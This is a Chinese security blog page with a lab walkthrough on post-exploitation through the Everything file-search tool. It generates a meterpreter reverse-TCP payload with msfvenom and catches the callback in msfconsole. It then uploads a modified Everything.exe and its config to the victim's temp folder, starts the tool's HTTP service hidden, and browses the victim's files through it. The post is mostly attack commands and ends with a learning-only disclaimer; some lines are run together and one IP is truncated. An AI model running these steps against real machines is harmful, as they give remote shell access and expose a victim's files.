本站vip特权 - 全站资源免费下载

限时特惠

Everything后渗透的利用

0x00 Everything简介:

“Everything”是一个运行于Windows系统,基于文件、文件夹名称的快速搜索引擎。

“Everything”在搜索之前就会把所用的文件和文件夹都列出来,这一点与Windows自带的搜索系统不一样,所以我们称之为“Everything”。

在搜索框输入文字,它就会只显示过滤后的文件和目录。

0x01 搭建测试环境及配置Everything

测试环境

攻击机(kali)      192.168.41.132

被害机(win10)  192.168.41.129

Everything配置

建议服务器端口不与FTP和HTTP的默认端口相同

%title插图%num%title插图%num

其中:

-install-client-service         安装客户服务

-start-client-service           启动服务

%title插图%num

0x02 漏洞复现:

1、选用的win10环境,所以直接kali生成一个木马,上传exe(木马)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.41.132 lport=4444 -f exe -o /root/e.exe

msfconsole进行攻击,拿到shell

msf > use exploit/multi/handler     #加载模块

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp    #设置payloadmsf exploit(multi/handler) > set lhost kali的ip   #设置kali的ipmsf exploit(multi/handler) > set lport 1211   #设置kali的端口msf exploit(multi/handler) > exploit   #执行

2、上传已经修改好的everything

meterpreter > upload -r /root/Everything.exe c:\\windows\\temp

meterpreter > upload -r /root/Everything.ini c:\\windows\\temp

%title插图%num%title插图%num3、启动everything

execute -f ‘C:\windows\temp\Everything.exe’ -a -install-client-service –H

execute -f ‘C:\windows\temp\Everything.exe’ -a -start-client-service –H

%title插图%num

4、访问168.41.129:8088->输入开始设置的everything的密码

%title插图%num

最后说一句:“大佬”腻害~~慕了慕了

PS:本文仅供学习,可在虚拟机搭环境复现,勿用做非授权测试。。。

工具

python_mmdt:从0到1--实现简单恶意代码分类器(二)

2021-1-27 16:12:59

工具

加密工具VeraCrypt的文件加密卷指南

2021-1-31 13:33:42

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索